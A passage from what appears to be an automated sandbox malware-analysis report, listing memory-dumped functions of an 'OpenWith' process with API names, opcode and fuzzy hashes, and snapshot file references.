                        • Opcode Fuzzy Hash: c90adcd0eea0c5e08c1d8f092ee7ab60bc92da0a83167810985a0d7785137009
                        • Instruction Fuzzy Hash: 39E0EC30519D898FEB49BB389848B5536E0FF19314FA40565C40BC72E0E6BCE587CB50
                        Function 00007DF41F033810 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: ??3@
                        • String ID:
                        • API String ID: 613200358-0
                        • Opcode ID: 9ea0ef64f8e175971b3757663d6ca98ea60d11fb241b1fa8108d7b95556115b0
                        • Instruction ID: a45d897adfee8509f83221443b5df8e750a7fb3796b95fc7b2370eadaf57ee15
                        • Opcode Fuzzy Hash: 9ea0ef64f8e175971b3757663d6ca98ea60d11fb241b1fa8108d7b95556115b0
                        • Instruction Fuzzy Hash: 03B01224D57D8F06FE4C33760FAA0253960BF58311FC40224D806C0551F50DC0E68352
                        Function 00007DF41F041C08 Relevance: 1.3, APIs: 1, Instructions: 71stringCOMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID: lstrcmpi
                        • String ID:
                        • API String ID: 1586166983-0
                        • Opcode ID: baf14e6f116fe512c943b5f51774f96ca5cd98818a459cbe1e6267cfd3004480
                        • Instruction ID: be5082c4a783e126cef1ac9b6128c73cec41718d96df517ff3fff78bcb30c5e9
                        • Opcode Fuzzy Hash: baf14e6f116fe512c943b5f51774f96ca5cd98818a459cbe1e6267cfd3004480
                        • Instruction Fuzzy Hash: 1D115430B04D884BEB59AB68DC6D7A63BE1FF94621F640237D40FC61A6EE2C9905C660
                        Function 00007DF41F177003 Relevance: 1.3, APIs: 1, Instructions: 43COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333698847.00007DF41F177000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F177000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f177000_OpenWith.jbxd
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 96b62db58244428d6a64d9046a594f9ff996be7dc69b7f1caddc712a1833717b
                        • Instruction ID: 86c1df8f1631c7053a66f99d21dc14c789dd9ed144011e88e1f4eafdf1539518
                        • Opcode Fuzzy Hash: 96b62db58244428d6a64d9046a594f9ff996be7dc69b7f1caddc712a1833717b
                        • Instruction Fuzzy Hash: E1F05B30618D045FDE98EB1DC885E5177E1FB9C310B504559D44DC3565E924E895CBC6

                        Non-executed Functions

                        Function 00007DF41F05BFA1 Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 908846e4d56906f08b5523d06497ec254c0ff1885d66f9c620a5f7baa71d2024
                        • Instruction ID: 5fd85f07ed1ea7bdab0a8e4948fe0c142f4bce46493ac3c5a4957af1fc578ae2
                        • Opcode Fuzzy Hash: 908846e4d56906f08b5523d06497ec254c0ff1885d66f9c620a5f7baa71d2024
                        • Instruction Fuzzy Hash: DDB01120EAC800C2C2080E0AB802330F2B0E30B300F0030302082F3A22CAA0CC80808F
                        Function 0000025B14E20511 Relevance: .0, Instructions: 9COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000003.00000002.3331284161.0000025B14E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000025B14E20000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_25b14e20000_OpenWith.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d522c07823fb8778296108337a3d1ec347010d1dae431256f70b68abef76ec51
                        • Instruction ID: 9c6f723353de5f7bfac1b68b00d860ec9f8fa9508ac40f659eae0282c9a534f1
                        • Opcode Fuzzy Hash: d522c07823fb8778296108337a3d1ec347010d1dae431256f70b68abef76ec51
                        • Instruction Fuzzy Hash: 26B01132E28A0082E3880E0AB8023B0F2B0C30B300F00B0322008F3220C828CC08028F
                        Function 00007DF41F03ABBE Relevance: .0, Instructions: 5COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000003.00000002.3333472313.00007DF41F031000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF41F031000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_7df41f031000_OpenWith.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a8a76b3ce062aa2a8694022e39f2cf8a10201159f157325d25f5c49661ee27e0
                        • Instruction ID: c70ab76f8eb2cb21c5c55eeba389027639681abe63233c9de51630a38dfad6b9
                        • Opcode Fuzzy Hash: a8a76b3ce062aa2a8694022e39f2cf8a10201159f157325d25f5c49661ee27e0
                        • Instruction Fuzzy Hash: 59A0029250211999CF10FFD4B707F997334AE84F94B12807CC9412A050F32C9093D210